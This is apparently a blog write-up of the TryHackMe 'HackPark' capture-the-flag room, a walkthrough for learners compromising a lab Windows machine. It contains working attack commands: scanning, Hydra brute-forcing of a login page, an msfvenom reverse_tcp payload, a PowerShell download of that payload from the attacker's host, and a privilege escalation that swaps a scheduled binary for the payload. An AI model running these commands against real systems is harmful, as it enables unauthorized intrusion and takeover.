HackPark — TryHackMe

Write-up

Bat_09
5 min readMay 21, 2021

Task 1: Deploy the vulnerable Windows machine

Whats the name of the clown displayed on the homepage?

— >To get this we need to do reverse image lookup.Just google reverse image link and submit the clown image, you will be getting his name.

Let’s enumerate the machine further to know more about it, use nmap to know about open ports and services in them.

sudo nmap -T5 -sC -sV -Pn <target_ip>

nmap scan results

We have access to robots.txt directory let’s look into it.Well these directories are not allowed to access, we can however find other directories.

Now look for hidden directories using gobuster.

sudo gobuster dir -u http://<target_ip>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt — wildcard php,html

There were many directories that came into result, the one that interests us is the admin directory, heading on to it we got a login page! Brute-force using hydra.

Task 2 : Using Hydra to brute-force a login

Read up the task and know how to use hydra if you are not familiar with it,now brute-force! Intercept the request through BurpSuite to look into error message.Username is already in the hints, that is admin.Let’s find out password.

Intercepting request using BurpSuite
Using Hydra to brute-force login page.

Login using the cracked credentials.

Task 3 : Compromise the machine

This particular version of BlogEngine can be exploited, find the exploit in exploitdb using this exploit we can gain initial access to the server!

As the exploit says we need to upload it and then can be triggered by browsing to the url as shown in above snap.Before submitting rename the exploit file to PostView.ascx.

Reverse shell

Now we got our initial access to the machine. By using metasploit we can further escalate our privilege to Administrator.

Task 4 : Windows Privilege Escalation

First we need to generate a .exe file that will get us shell in metasploit, using msfvenom we can create one.

sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_machine_ip> LPORT=9001 -f exe > mall.exe

Upload it to the shell that we have access, host a python server at your local machine using the command,

python -m SimpleHTTPServer

At the shell that you have access, download by using the below command,

powershell -c “Invoke-WebRequest -Uri ‘http://<your_ip>:8080/shell.exe' -OutFile ‘C:\Windows\Temp\mall.exe’”

In the terminal now start msfconsole,

use exploit/multi/handler

set PAYLOAD windows /meterpreter/reverse_tcp

set LHOST tun0

run

Execute the malicious file in the target machine, .\mall.exe

Now we got a meterpreter session.

You can use sysinfo to know more about the target system.

Further enumerate the machine.

What is the name of the abnormal service running?

Using WinPEAS to find the abnormal services. Host the python server on your machine and download it to target machine as we did before for malware file.

Run the winPEAS.bat file to find abnormal services.

.\winPEAS.bat

We found out that WindowsScheduler.exe is the abnormal service running in the system.

What is the name of the binary you’re supposed to exploit?

Look into the logs file of abnormal services in the SystemScheduler directory.

Here we can observe that Message.exe is repeating itself after every 30 seconds, this is our way into escalating privilege. Download the mall.exe file and rename it to Message.exe, So that when it runs we can get another shell as Administrator . Exit the current metasploit session and run we will get the new session as Administrator.

What is the user flag (on Jeffs Desktop)?

Browse to jeff file and we can find the user flag!!

What is the root flag?

Similarly we can find root flag!

Task 5: Privilege Escalation Without Metasploit

>Now we can generate a more stable shell using msfvenom, instead of using a meterpreter, This time let’s set our payload to windows/shell_reverse_tcp

sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_machine_ip> LPORT=9001 -f exe > mall.exe

>After generating our payload we need to pull this onto the box using powershell.

We have already done it in TASK4 .

>Using winPeas, what was the Original Install time? (This is date and time)

systeminfo

Use this to find the Original Install time!

By this we successfully completed all the tasks and got the flags required!!

Thank You!! 👻

Happy Hacking🦇

--

--

Bat_09
Bat_09

No responses yet